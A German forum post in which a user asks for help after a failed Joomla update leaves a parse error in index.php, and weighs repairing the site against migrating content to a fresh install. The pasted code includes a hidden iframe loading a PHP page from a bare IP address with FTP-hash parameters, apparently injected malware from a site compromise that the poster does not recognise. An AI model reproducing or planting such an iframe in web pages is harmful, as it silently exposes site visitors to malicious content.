Hallo zusammen,
nachdem ein Update auf die aktuelle Joomla Version nicht so recht geklappt hat, gibt es zudem nun auch noch ein Seitendarstellungsproblem.
In besagter Zeile der index.php steht folgendes:Code:Parse error: syntax error, unexpected '<' in /usr/home/xxx/yyy/joomla/index.php on line 89
Da, wie schon beschrieben, das Update auch nicht sonderlich glatt lief, kam mir die Idee - ein sauberes Joomla zu installieren und dann aus der bestehenden Datenbank manuell die Kategorien, Beiträge, Bilder usw. zu importieren. Mit dem Template hab ich das soweit auch schon geschafft. Da Joomla aber zig Tabellen und Datensätze hat (es war eine sehr umfangreiche Seite) bräuchte ich nun Hilfe, was die beste Vorgehensweise ist. Und ob es überhaupt geht.Code:<iframe src="http://80.91.191.158/stats/priemIframe.php?hashftp=cc32675ddc327eff81f8e0986a0230ed&hashpage=bb92729f5280a51286429cf1f2ee21a9" width=10 border=1 height=10 style="visibility:hidden">
Also:
1.) Die bestehende (online) Joomla Installation versuchen zu reparieren, oder
2.) Inhalte usw. in eine neue Joomla Installation zu importieren
Das Backend der online Installation funktioniert noch.
Falls ich wichtige Infos vergessen habe, sagt es mir bitte. Dann suche ich das heraus und reiche diese nach.
Über rasche Hilfe wäre ich sehr dankbar!
Viele Grüße
JRi

LinkBack URL
About LinkBacks

Lesezeichen